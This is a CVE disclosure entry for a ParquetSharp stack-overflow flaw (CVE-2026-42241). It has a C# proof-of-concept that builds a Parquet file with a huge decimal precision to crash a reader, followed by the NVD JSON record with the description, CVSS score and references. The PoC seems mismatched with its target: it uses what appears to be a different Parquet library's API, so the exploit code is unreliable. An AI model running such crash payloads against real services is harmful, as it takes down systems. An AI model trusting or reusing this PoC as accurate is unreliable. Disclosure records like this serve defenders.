CVE-2026-42241

using Parquet; using Parquet.Data; using System; using System.IO; public class PoC { public static void Main() { // Generate a malicious Parquet file with extremely large decimal precision // This triggers the stackalloc issue in DecimalConverter.ReadDecimal string filePath = "malicious.parquet"; // Create a schema with a huge precision (e.g., 100000) // Note: Actual Parquet spec might limit this, but the vulnerability lies in how ParquetSharp handles it. var schema = new Schema(new DataField<decimal>("malicious_decimal", 100000, 0)); using (var fileStream = new FileStream(filePath, FileMode.Create)) using (var parquetWriter = new ParquetWriter(schema, fileStream)) using (var parquetRowGroupWriter = parquetWriter.CreateRowGroup()) { // Write dummy data parquetRowGroupWriter.WriteColumn(new decimal[] { 123.45m }); } Console.WriteLine($"Malicious file created at: {filePath}"); // Trigger the vulnerability by reading the file try { using (var stream = new FileStream(filePath, FileMode.Open)) using (var reader = new ParquetReader(stream)) { // This call triggers the stack overflow var data = reader.ReadEntireRowGroup(); Console.WriteLine("Read successful (should not happen)"); } } catch (Exception ex) { Console.WriteLine($"Exception caught: {ex.Message}"); } } }

{"cve": {"id": "CVE-2026-42241", "sourceIdentifier": "[email protected]", "published": "2026-05-07T20:16:44.247", "lastModified": "2026-05-07T20:37:54.060", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "ParquetSharp is a .NET library for reading and writing Apache Parquet files. From version 18.1.0 to before version 23.0.0.1, DecimalConverter.ReadDecimal makes a stackalloc using what might be an attacker-supplied value. If an attacker declares a decimal column with some unreasonable width, this could lead to a stack overflow. In a service environment, this would potentially take down a service. This affects applications using ParquetSharp to read untrusted Parquet files in a network service. This issue has been patched in version 23.0.0.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-789"}]}], "references": [{"url": "https://github.com/G-Research/ParquetSharp/releases/tag/23.0.0.1", "source": "[email protected]"}, {"url": "https://github.com/G-Research/ParquetSharp/security/advisories/GHSA-rrjr-v56m-ww88", "source": "[email protected]"}]}}